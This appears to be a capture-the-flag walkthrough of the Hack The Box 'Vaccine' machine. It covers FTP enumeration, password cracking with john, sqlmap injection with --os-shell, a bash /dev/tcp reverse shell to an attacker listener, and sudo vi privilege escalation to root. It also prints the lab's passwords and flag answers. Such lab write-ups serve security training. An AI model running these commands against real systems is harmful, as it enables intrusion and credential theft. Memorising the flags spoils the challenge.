Hack The Box - Vaccine

Hack The Box - Vaccine

This article discusses the solution for Hack the Box Vaccine Challenge tasks so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Vaccine Solution

Besides SSH and HTTP, what other service is hosted on this box?

  1. Run an nmap scan with the -sV (version of services) -sC(default scripts for service discovery and vulnerability detection)

     nmap -sV -sC {target_machine_ip}
     nmap -sC -sV

Screenshot 2024-02-19 at 8 50 14 PM

Answer: ftp

This service can be configured to allow login with any password for specific username. What is that username?

As with the nmap results above the sC option was able to determine that Anonymous FTP login allowed. If you do a google search the username for this is usually anonymous


What is the name of the file downloaded over this service?

  1. Let's connect via ftp
ftp {target_machine_ip}
  1. For username just use anonymous and just enter blank password.

  2. Enter ls and you will find backup.zip

  3. Run getbackup.zip

Screenshot 2024-02-19 at 11 41 56 PM


What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

  1. We try to unzip the backup.zip however a password is required.

    Screenshot 2024-02-20 at 12 00 57 AM

  2. Do a quick google search and you will find the answer

Answer: zip2john

What is the password for the admin user on the website?

  1. Let's run the zip2john script to crack the password. First let's obtain the password hashes.

     zip2john backup.zip > zip.txt

    Screenshot 2024-02-20 at 11 08 05 PM

  2. Then let's crack the password for the backup.zip

     john zip.txt

    Screenshot 2024-02-20 at 11 08 56 PM

  3. Now let's unzip backup.zip with the password 741852963. This gives us two files index.php and style.css

     unzip backup.zip

Screenshot 2024-02-20 at 11 10 22 PM

  1. Now let's investigate the index.php vim index.php. Here we find a hashed password 2cb42f8734ea607eefed3b70af13bbd3 for the username admin.

Screenshot 2024-02-20 at 11 21 43 PM

  1. Let's analyze the hash type by going on any hash analyzer. We use https://hashes.com/en/tools/hash_identifier in this case and find that it is MD5 format.

    Screenshot 2024-02-20 at 11 35 10 PM

  2. Create a file called admin-hash.txt then insert the hash found in the previous step. Let's crack the hash password using john

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 admin-hash.txt

Screenshot 2024-02-20 at 11 42 25 PM

Answer: qwerty789

What option can be passed to sqlmap to try to get command execution via the sql injection?

  1. Login using username admin and password qwerty789

  2. Go to browser and get the cookie PHPSESSID value

Screenshot 2024-02-22 at 12 45 40 AM

  1. Next as we view with the page after we login, we can see one possible form to attack with SQL injection. We observe that submitting it appends a query parameter search

Screenshot 2024-02-22 at 12 49 49 AM

  1. Let's use sqlmap and run the following.
sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}"

sqlmap -u "http://{target_ip}/dashboard.php?search=test" --cookie="PHPSESSID={cookie_value}" --os-shell
  1. We have spawned a os-shell with user postgres. However executing sudo -l does not yield any meaningful results. The os-shell is limited in commands it can execute. It is not interactive

Screenshot 2024-02-22 at 12 56 35 AM

  1. Let's go to our attack machine and create a netcat listner server
  nc -lvnp 5000
  1. On our target machine running sqlmap os-shell let's connect to our server to spawn a reverse shell.
 bash -c  "bash -i >& /dev/tcp/{attack_machine_ip}/5000  0>&1"
  1. We have spawned a reverse shell however we do not have an interactive shell yet.

Screenshot 2024-02-22 at 1 11 58 AM

  1. Run the following to have an interactive shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm
  1. We now have an interactive shell. Hovever we have to know the password of user postgres to run sudo -l

Screenshot 2024-02-22 at 2 00 25 AM

  1. We have to find the password in the system. And since this server running a website, one of the places we can look at is /var/www/

Screenshot 2024-02-22 at 2 26 14 AM

  1. Let's explore each of the files in the html folder. Under the dashboard.php file we find.

Screenshot 2024-02-22 at 2 32 15 AM

  1. We test this password by using it for the password prompt for sudo -l Where we find that we have sudo rights for vi program.

Screenshot 2024-02-22 at 2 10 53 AM

Answer: vi

Submit user flag

  1. Our connection via reverse shell is always being disconnected from the server. Since we know the password (P@s5w0rd!) of the user postgres, let's just connect via ssh.

     ssh postgres@{target_machine_ip}
  2. Run cd ~/ to go to postgres user's folder to see if there is something interesting. In here we will find user.txt

Screenshot 2024-02-22 at 2 49 00 AM


Submit the root flag

  1. Continuing with our terminal established via ssh connnection in the previous section. We know that our current postgres user has sudo privileges for vi. Now let's attempt priviledge escalation.

  2. Let's go to https://gtfobins.github.io/gtfobins/vi/#shell to check if we can run a command to escalte our privileges to root.

  3. Run the following:

      sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

    Screenshot 2024-03-10 at 4 29 43 PM

  4. Then execute the following from inside vi based on GTFOBins

     :set shell=/bin/sh
  5. Now we have escalated our privileges and have a shell with root privileges. Now let's look for root.txt

     find / -type f -name "root.txt"

Screenshot 2024-03-10 at 4 33 06 PM

  1. Now let's look at the file to get flag

     vi /root/root.txt

Answer: ddd6e058e814260bc70e9bbdef2715849

Until next time. Keep learning.

Stay stoked and code. :)

I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)